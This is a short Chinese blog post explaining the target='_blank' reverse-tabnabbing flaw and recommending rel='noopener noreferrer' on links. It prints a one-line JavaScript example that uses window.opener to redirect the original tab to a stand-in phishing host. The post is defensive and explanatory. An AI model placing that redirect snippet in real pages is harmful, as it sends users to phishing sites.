target="_blank" 安全漏洞 要增加 rel="nofollow me noopener noreferrer" 来堵住钓鱼安全漏洞

(target="_blank"安全漏洞极为普遍)解决方法:
在超链接上增加 rel="nofollow me noopener noreferrer"

target="_blank" 如果未加上rel="noopener"属性, 就会让用户暴露在一个简单的钓鱼攻击之下,可以使用以下脚本来

Copy
if (window.opener) { window.opener.location = "https://phishing.link?referrer=" + document.referrer; }

window.opener API会给新页面对原有窗口的访问入口,并授予一些权限。这其中的一些权限被跨域限制拦截了,但是window.location是漏网之鱼。

参考 :https://my.oschina.net/jsan/blog/741317
转载原文: https://www.zcfy.cc/article/the-target-blank-vulnerability-by-example-1178.html

posted @   JonPan  阅读(583)  评论(0编辑  收藏  举报
编辑推荐:
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
点击右上角即可分享
微信分享提示